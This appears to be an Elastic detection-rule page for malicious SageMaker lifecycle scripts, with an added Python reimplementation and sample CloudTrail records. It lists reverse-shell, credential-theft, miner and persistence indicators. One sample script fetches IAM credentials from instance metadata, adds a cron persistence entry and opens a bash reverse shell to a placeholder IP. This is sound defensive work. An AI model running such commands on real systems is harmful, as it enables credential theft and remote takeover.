AWS SageMaker Notebook Lifecycle Configuration With Suspicious Script Content

Elastic Detection Rules

Summary
Detects suspicious content in AWS SageMaker notebook lifecycle configurations (OnStart or OnCreate) by base64-decoding the lifecycle script and scanning for high-signal indicators of malicious activity. The rule listens to CloudTrail events CreateNotebookInstanceLifecycleConfig/UpdateNotebookInstanceLifecycleConfig that succeed and originate from non-service principals, then decodes the field Esql_priv.aws_cloudtrail_lifecycle_script (base64) and checks for the following patterns:

  • Reverse shells: /dev/tcp/, /dev/udp/, bash -i, nc -e, ncat, socat, mkfifo, import socket, pty.spawn, perl/ruby/php socket idioms
  • IMDS credential access: 169.254.169.254, /latest/meta-data/, /latest/api/token
  • Download-and-execute or decode-and-execute: | sh, | bash, base64 -d
  • Cryptominer activity: xmrig, minerd, stratum+
  • Persistence indicators: authorized_keys, crontab, /etc/cron

A match signals a potential attempt to backdoor the notebook, steal the execution role's credentials, or establish persistent code execution, especially since the script runs as root. The rule is a high-fidelity companion to lifecycle-configuration-change detections and provides targeted indicators to accelerate investigation. MITRE mappings include T1546 (Event Triggered Execution) and T1059 (Command and Scripting Interpreter, Unix Shell) across Execution and Persistence tactics.
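The following Python is an added example that is not Elastic's rule code and not the ES|QL the rule itself runs; it reproduces the logic the summary describes so the gating and matching can be exercised offline. It assumes CloudTrail records carry the lifecycle hooks under requestParameters.onCreate / requestParameters.onStart as lists of objects with a base64 content field, and the regular expressions are this example's own approximations of the indicator list above. The four CloudTrail records are constructed sample data.

```python
import base64
import json
import re

# Indicator patterns grouped by the categories the rule summary names.
# These regexes are this example's own; the rule's exact expressions are not on the page.
INDICATORS = {
    "reverse_shell": [r"/dev/tcp/", r"/dev/udp/", r"bash -i", r"\bnc -e\b", r"\bncat\b",
                      r"\bsocat\b", r"\bmkfifo\b", r"import socket", r"pty\.spawn"],
    "imds_access": [r"169\.254\.169\.254", r"/latest/meta-data/", r"/latest/api/token"],
    "download_or_decode_execute": [r"\|\s*sh\b", r"\|\s*bash\b", r"base64 -d"],
    "cryptominer": [r"\bxmrig\b", r"\bminerd\b", r"stratum\+"],
    "persistence": [r"authorized_keys", r"\bcrontab\b", r"/etc/cron"],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats] for cat, pats in INDICATORS.items()}
LIFECYCLE_EVENTS = {"CreateNotebookInstanceLifecycleConfig",
                    "UpdateNotebookInstanceLifecycleConfig"}


def extract_scripts(event):
    """Yield (hook, decoded_text) for each lifecycle script in a CloudTrail record.

    Assumed record shape: requestParameters.onCreate / onStart -> [{"content": "<base64>"}].
    Undecodable content yields an empty string so the caller can still note the hook.
    """
    params = event.get("requestParameters") or {}
    scripts = []
    for hook in ("onCreate", "onStart"):
        for entry in params.get(hook) or []:
            raw = entry.get("content", "")
            try:
                text = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                text = ""
            scripts.append((hook, text))
    return scripts


def scan_script(text):
    """Return {category: [matched_pattern, ...]} for every indicator found in the script."""
    hits = {}
    for cat, pats in COMPILED.items():
        matched = [p.pattern for p in pats if p.search(text)]
        if matched:
            hits[cat] = matched
    return hits


def evaluate_event(event):
    """Apply the rule's gating conditions, then scan decoded scripts.

    Returns {hook: {category: [patterns]}} when suspicious content is found, else None.
    """
    if event.get("eventSource") != "sagemaker.amazonaws.com":
        return None
    if event.get("eventName") not in LIFECYCLE_EVENTS:
        return None
    if event.get("errorCode"):            # only successful API calls are in scope
        return None
    if (event.get("userIdentity") or {}).get("type") == "AWSService":
        return None                       # non-service principals only
    findings = {}
    for hook, text in extract_scripts(event):
        hits = scan_script(text)
        if hits:
            findings[hook] = hits
    return findings or None


def _record(event_name, identity_type, on_start_script, error_code=None):
    """Build a constructed CloudTrail-like record for the samples below."""
    rec = {
        "eventSource": "sagemaker.amazonaws.com",
        "eventName": event_name,
        "userIdentity": {"type": identity_type, "arn": "arn:aws:iam::123456789012:user/sample"},
        "requestParameters": {
            "notebookInstanceLifecycleConfigName": "sample-config",
            "onStart": [{"content": base64.b64encode(on_start_script.encode()).decode()}],
        },
    }
    if error_code:
        rec["errorCode"] = error_code
    return rec


# Constructed sample scripts: one routine package install, one carrying three indicator classes.
BENIGN_SCRIPT = "#!/bin/bash\nsudo -u ec2-user -i <<'EOF'\npip install --upgrade pandas\nEOF\n"
SUSPICIOUS_SCRIPT = (
    "#!/bin/bash\n"
    "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/creds\n"
    "(crontab -l; echo '@reboot /tmp/sync.sh') | crontab -\n"
    "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1\n"
)

SAMPLE_EVENTS = {
    "benign": _record("CreateNotebookInstanceLifecycleConfig", "IAMUser", BENIGN_SCRIPT),
    "suspicious": _record("UpdateNotebookInstanceLifecycleConfig", "IAMUser", SUSPICIOUS_SCRIPT),
    "service_principal": _record("CreateNotebookInstanceLifecycleConfig", "AWSService", SUSPICIOUS_SCRIPT),
    "failed_call": _record("CreateNotebookInstanceLifecycleConfig", "IAMUser", SUSPICIOUS_SCRIPT,
                           error_code="AccessDenied"),
}

if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        print(name, "->", json.dumps(evaluate_event(ev)))
```

Only the "suspicious" record produces findings; the same script from a service principal or on a failed call is dropped by the gating checks before any decoding happens, which mirrors the summary's "succeed and originate from non-service principals" condition.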
Categories
  • Cloud
  • AWS
Data Sources
  • Cloud Service
ATT&CK Techniques
  • T1546
  • T1059
  • T1059.004
Created: 2026-06-29